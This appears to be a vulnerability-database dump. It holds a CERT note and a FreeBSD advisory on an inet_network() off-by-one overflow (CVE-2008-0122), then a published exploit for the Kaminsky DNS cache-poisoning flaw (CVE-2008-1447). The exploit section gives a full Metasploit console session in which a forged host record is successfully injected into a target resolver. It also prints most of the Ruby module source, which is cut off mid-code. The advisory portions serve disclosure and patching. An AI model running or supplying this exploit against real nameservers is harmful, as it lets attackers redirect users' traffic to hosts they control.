Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. 
Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gnu ADNS Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the 
vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Software Consortium Unknown\n\nNotified: December 10, 2007 Updated: December 10, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. 
Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Men & Mice Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Metasolv Software, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. 
Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. 
Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Shadowsupport Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. 
Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a 
statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://security.freebsd.org/advisories/FreeBSD-SA-08:02.libc.asc>\n * [http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.6.2.1&r2=1.6.2.2&cvsroot=glibc&f=h](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.6.2.1&r2=1.6.2.2&cvsroot=glibc&f=h>)\n * [http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.8&r2=1.9&cvsroot=glibc&f=h](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.8&r2=1.9&cvsroot=glibc&f=h>)\n * <http://www.securityfocus.com/bid/27283>\n * <http://securitytracker.com/alerts/2008/Jan/1019189.html>\n * <http://secunia.com/advisories/28367>\n * <http://xforce.iss.net/xforce/xfdb/39670>\n\n### Acknowledgements\n\nThanks to Mark Andrews of ISC for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-0122](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-0122>) \n---|--- \n**Severity Metric:** | 0.76 \n**Date Public:** | 2007-12-10 \n**Date First 
Published:** | 2008-01-25 \n**Date Last Updated: ** | 2008-04-28 13:54 UTC \n**Document Revision: ** | 16 \n", "modified": "2008-04-28T13:54:00", "published": "2008-01-25T00:00:00", "id": "VU:203611", "href": "https://www.kb.cert.org/vuls/id/203611", "type": "cert", "title": "inet_network() off-by-one buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "cvelist": ["CVE-2008-0122"], "description": "Off-by-one heap overflow in inet_network() .", "edition": 1, "modified": "2008-01-16T00:00:00", "published": "2008-01-16T00:00:00", "id": "SECURITYVULNS:VULN:8571", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8571", "title": "FreeBSD libc / libbind memory corruption", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "cvelist": ["CVE-2008-0122"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-08:02.libc Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: inet_network() buffer overflow\r\n\r\nCategory: core\r\nModule: libc\r\nAnnounced: 2008-01-14\r\nCredits: Bjoern A. Zeeb and Nate Eldredge\r\nAffects: FreeBSD 6.2\r\nCorrected: 2008-01-14 22:57:45 UTC (RELENG_7, 7.0-PRERELEASE)\r\n 2008-01-14 22:55:54 UTC (RELENG_7_0, 7.0-RC2)\r\n 2008-01-14 22:56:05 UTC (RELENG_6, 6.3-PRERELEASE)\r\n 2008-01-14 22:56:18 UTC (RELENG_6_3, 6.3-RELEASE)\r\n 2008-01-14 22:56:44 UTC (RELENG_6_2, 6.2-RELEASE-p10)\r\nCVE Name: CVE-2008-0122\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. 
Background\r\n\r\nThe resolver is the part of libc that resolves hostnames (example.com) to\r\ninternet protocol (IP) addresses (192.0.2.1) and vice versa.\r\n\r\nThe inet_network() function returns an in_addr_t representing the network\r\naddress of the IP address given to inet_network() as a character string in\r\nthe dot-notation.\r\n\r\nII. Problem Description\r\n\r\nAn off-by-one error in the inet_network() function could lead to memory\r\ncorruption with certain inputs.\r\n\r\nIII. Impact\r\n\r\nFor programs which pass untrusted data to inet_network(), an\r\nattacker may be able to overwrite a region of memory with user defined\r\ndata by causing specially crafted input to be passed to\r\ninet_network().\r\n\r\nDepending on the region of memory the attacker is able to overwrite,\r\nthis might lead to a denial of service or potentially code execution\r\nin the program using inet_network().\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7.0-PRERELEASE, or 6-STABLE, or\r\nto the RELENG_7_0, RELENG_6_3, or RELENG_6_2 security branch dated\r\nafter the correction date.\r\n\r\n2) To patch your present system:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.0, 6.3,\r\nor 6.2 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-08:02/libc.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-08:02/libc.patch.asc\r\n\r\nb) Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile the operating system as described in\r\n<URL: http://www.freebsd.org/handbook/makeworld.html> and reboot the\r\nsystem.\r\n\r\nVI. 
Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_6\r\n src/lib/libc/inet/inet_network.c 1.2.2.2\r\nRELENG_6_3\r\n src/UPDATING 1.416.2.37.2.3\r\n src/sys/conf/newvers.sh 1.69.2.15.2.3\r\n src/lib/libc/inet/inet_network.c 1.2.2.1.4.1\r\nRELENG_6_2\r\n src/UPDATING 1.416.2.29.2.13\r\n src/sys/conf/newvers.sh 1.69.2.13.2.13\r\n src/lib/libc/inet/inet_network.c 1.2.2.1.2.1\r\nRELENG_7\r\n src/lib/libc/inet/inet_network.c 1.4.2.1\r\nRELENG_7_0\r\n src/UPDATING 1.507.2.3.2.1\r\n src/sys/conf/newvers.sh 1.72.2.5.2.2\r\n src/lib/libc/inet/inet_network.c 1.4.4.1\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0122\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-08:02.libc.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (FreeBSD)\r\n\r\niD8DBQFHi+ntFdaIBMps37IRAr+GAJ9YxPIsD5OeyYkrwo5auWKgQwZRywCdHSrY\r\nNsNxcHsgdo7divn+LEkQ9po=\r\n=3RQQ\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-01-16T00:00:00", "published": "2008-01-16T00:00:00", "id": "SECURITYVULNS:DOC:18862", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18862", "title": "FreeBSD Security Advisory FreeBSD-SA-08:02.libc", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": " ____ ____ __ __\r\n / \ / \ | | | |\r\n ----====####/ /\__\##/ /\ \##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\ \/ /#| |##| |#| |##| |######======------\r\n \____/ |__| |__| \______/\r\n \r\n Computer 
Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0002\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_host.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious host entry\r\ninto the target nameserver. By causing the target nameserver to query\r\nfor random hostnames at the target domain, the attacker can spoof a\r\nresponse to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n _ _ _ _\r\n | | | | (_) |\r\n _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_\r\n| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|\r\n| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_\r\n|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|\r\n | |\r\n |_|\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 72 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_host\r\nmsf auxiliary(bailiwicked_host) > show options\r\n\r\nModule options:\r\n\r\n Name Current Setting Required Description\r\n ---- --------------- -------- -----------\r\n HOSTNAME pwned.example.com yes Hostname to hijack\r\n NEWADDR 1.3.3.7 yes New address for hostname\r\n RECONS 
208.67.222.222 yes Nameserver used for reconnaissance\r\n RHOST yes The target address\r\n SRCPORT yes The target server's source query port (0 for automatic)\r\n XIDS 10 yes Number of XIDs to try for each query\r\n\r\nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\n\r\nmsf auxiliary(bailiwicked_host) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\n\r\nmsf auxiliary(bailiwicked_host) > set SRCPORT 0\r\nSRCPORT => 0\r\n\r\nmsf auxiliary(bailiwicked_host) > run\r\n[*] Switching to target port 48178 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got answer with 2 answers, 0 authorities\r\n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.\r\n[*] Querying recon nameserver for address of ns89.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45\r\n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....\r\n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.\r\n[*] Querying recon nameserver for address of ns90.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45\r\n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....\r\n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject a poison record for pwned.example.com. 
into A.B.C.D:48178...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary(bailiwicked_host) > \r\n\r\nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D\r\n[*] exec: nslookup pwned.example.com A.B.C.D\r\n\r\nServer: A.B.C.D\r\nAddress: A.B.C.D#53\r\n\r\nNon-authoritative answer:\r\nName: pwned.example.com\r\nAddress: 1.3.3.7\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary\r\n\r\n include Exploit::Remote::Ip\r\n\r\n def initialize(info = {})\r\n super(update_info(info, \r\n 'Name' => 'DNS BailiWicked Host Attack',\r\n 'Description' => %q{\r\n This exploit attacks a fairly ubiquitous flaw in DNS implementations\r\nwhich \r\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a\r\nsingle\r\n malicious host entry into the target nameserver by sending random\r\nsub-domain\r\n queries to the target DNS server coupled with spoofed replies to those\r\n queries from the authoritative nameservers for the domain which\r\ncontain a\r\n malicious host entry for the hostname to be poisoned in the authority\r\nand\r\n additional records sections. 
Eventually, a guessed ID will match and\r\nthe\r\n spoofed packet will get accepted, and due to the additional hostname\r\nentry\r\n being within bailiwick constraints of the original request the\r\nmalicious host\r\n entry will get cached.\r\n },\r\n 'Author' => [ 'I)ruid', 'hdm' ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 5585 $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2008-1447' ],\r\n [ 'US-CERT-VU', '8000113' ],\r\n [ 'URL',\r\n'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => \r\n [\r\n ["BIND", \r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Jul 21 2008'\r\n ))\r\n \r\n register_options(\r\n [\r\n OptPort.new('SRCPORT', [true, "The target server's source\r\nquery port (0 for automatic)", nil]),\r\n OptString.new('HOSTNAME', [true, 'Hostname to hijack',\r\n'pwned.example.com']),\r\n OptAddress.new('NEWADDR', [true, 'New address for hostname',\r\n'1.3.3.7']),\r\n OptAddress.new('RECONS', [true, 'Nameserver used for\r\nreconnaissance', '208.67.222.222']),\r\n OptInt.new('XIDS', [true, 'Number of XIDs to try for each\r\nquery', 10]),\r\n OptInt.new('TTL', [true, 'TTL for the malicious host entry',\r\n31337]),\r\n ], self.class)\r\n \r\n end\r\n \r\n def auxiliary_commands\r\n return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n end\r\n\r\n def cmd_check(*args)\r\n targ = args[0] || rhost()\r\n if(not (targ and targ.length > 0))\r\n print_status("usage: check [dns-server]")\r\n return\r\n end\r\n\r\n print_status("Using the Metasploit service to verify exploitability...")\r\n srv_sock = Rex::Socket.create_udp(\r\n 'PeerHost' => targ,\r\n 'PeerPort' => 53\r\n ) \r\n\r\n random = false\r\n ports = []\r\n lport = nil\r\n \r\n 1.upto(5) do |i|\r\n \r\n req = Resolv::DNS::Message.new\r\n txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n req.add_question(txt, 
Resolv::DNS::Resource::IN::TXT)\r\n req.rd = 1\r\n \r\n srv_sock.put(req.encode)\r\n res, addr = srv_sock.recvfrom()\r\n \r\n\r\n if res and res.length > 0\r\n res = Resolv::DNS::Message.decode(res)\r\n res.each_answer do |name, ttl, data|\r\n if (name.to_s == txt and data.strings.join('') =~\r\n/^([^\s]+)\s+.*red\.metasploit\.com/m)\r\n t_addr, t_port = $1.split(':')\r\n\r\n print_status(" >> ADDRESS: #{t_addr} PORT:\r\n#{t_port}")\r\n t_port = t_port.to_i\r\n if(lport and lport != t_port)\r\n random = true\r\n end\r\n lport = t_port\r\n ports << t_port\r\n end\r\n end\r\n end \r\n end\r\n \r\n srv_sock.close\r\n \r\n if(ports.length < 5)\r\n print_status("UNKNOWN: This server did not reply to our vulnerability check\r\nrequests")\r\n return\r\n end\r\n \r\n if(random)\r\n print_status("PASS: This server does not use a static source port. Ports:\r\n#{ports.join(", ")}")\r\n print_status(" This server may still be exploitable, but not by this\r\ntool.")\r\n else\r\n print_status("FAIL: This server uses static source ports and is vulnerable to\r\npoisoning")\r\n end\r\n end\r\n \r\n def run\r\n target = rhost()\r\n source = Rex::Socket.source_address(target)\r\n sport = datastore['SRCPORT']\r\n hostname = datastore['HOSTNAME'] + '.'\r\n address = datastore['NEWADDR']\r\n recons = datastore['RECONS']\r\n xids = datastore['XIDS'].to_i\r\n ttl = datastore['TTL'].to_i\r\n xidbase = rand(4)+2*10000\r\n\r\n domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]\r\n\r\n srv_sock = Rex::Socket.create_udp(\r\n 'PeerHost' => target,\r\n 'PeerPort' => 53\r\n )\r\n\r\n # Get the source port via the metasploit service if it's not set\r\n if sport.to_i == 0\r\n req = Resolv::DNS::Message.new\r\n txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n req.rd = 1\r\n \r\n srv_sock.put(req.encode)\r\n res, addr = srv_sock.recvfrom()\r\n \r\n if res and res.length > 0\r\n res = 
Resolv::DNS::Message.decode(res)\r\n res.each_answer do |name, ttl, data|\r\n if (name.to_s == txt and data.strings.join('') =~\r\n/^([^\s]+)\s+.*red\.metasploit\.com/m)\r\n t_addr, t_port = $1.split(':')\r\n sport = t_port.to_i\r\n\r\n print_status("Switching to target port #{sport} based\r\non Metasploit service")\r\n if target != t_addr\r\n print_status("Warning: target address\r\n#{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n end\r\n end\r\n end\r\n end\r\n end\r\n\r\n # Verify its not already cached\r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n query.rd = 0\r\n\r\n begin\r\n cached = false\r\n srv_sock.put(query.encode)\r\n answer, addr = srv_sock.recvfrom()\r\n\r\n if answer and answer.length > 0\r\n answer = Resolv::DNS::Message.decode(answer)\r\n answer.each_answer do |name, ttl, data|\r\n if((name.to_s + ".") == hostname and\r\ndata.address.to_s == address)\r\n t = Time.now + ttl\r\n print_status("Failure: This hostname is\r\nalready in the target cache: #{name} == #{address}")\r\n print_status(" Cache entry expires on\r\n#{t.to_s}... 
sleeping.")\r\n cached = true\r\n sleep ttl\r\n end\r\n end\r\n end\r\n end until not cached\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception => e\r\n print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n end\r\n\r\n res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false,\r\n:recursive => true) # reconnaissance resolver\r\n\r\n print_status "Targeting nameserver #{target} for injection of #{hostname} as\r\n#{address}"\r\n\r\n # Look up the nameservers for the domain\r\n print_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n answer0 = res0.send(domain, Net::DNS::NS)\r\n #print_status " Got answer with #{answer0.header.anCount} answers,\r\n#{answer0.header.nsCount} authorities"\r\n\r\n barbs = [] # storage for nameservers\r\n answer0.answer.each do |rr0|\r\n print_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n if rr0.type == 'NS'\r\n print_status " Querying recon nameserver for address of\r\n#{rr0.nsdname}..."\r\n answer1 = res0.send(rr0.nsdname) # get the ns's answer for the\r\nhostname\r\n #print_status " Got answer with #{answer1.header.anCount} answers,\r\n#{answer1.header.nsCount} authorities"\r\n answer1.answer.each do |rr1|\r\n print_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n res2 = Net::DNS::Resolver.new(:nameservers => rr1.address,\r\n:dns_search => false, :recursive => false, :retry => 1) \r\n print_status " Checking Authoritativeness: Querying\r\n#{rr1.address} for #{domain}..."\r\n answer2 = res2.send(domain)\r\n if answer2 and answer2.header.auth? 
